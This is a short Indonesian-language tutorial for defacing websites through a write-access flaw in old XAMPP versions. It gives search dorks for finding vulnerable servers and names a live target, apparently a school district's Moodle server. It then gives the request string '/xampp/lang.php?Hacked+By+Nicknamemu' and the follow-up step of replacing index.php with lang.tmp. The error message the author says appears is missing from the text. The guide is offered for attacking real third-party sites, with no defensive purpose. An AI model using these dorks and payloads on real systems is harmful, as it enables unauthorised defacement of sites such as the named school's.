XAMPP Write Access Vulnerability
Bismillahirrahmanirrahiim,
sebelumnya saya mohon maaf, jika ada step yg kalian tidak mengerti, dikarenakan saya sedang males bikin tutorial :D
untuk dork :
intitle:"XAMPP Version 1.6.0"
intitle:"XAMPP Version 1.5."
Live Target :
http://moodle.wilmington.k12.oh.us/xampp/
buka website target, dan masukkan exploit berikut :
/xampp/lang.php?Hacked+By+Nicknamemu
nanti akan muncul sebuah pesan error, jika tidak ada pesan error itu artinya tidak vuln.
disini saya mendapatkan pesan error seperti ini :
lalu kita ganti "index.php" menjadi "lang.tmp"
selesai ^_^.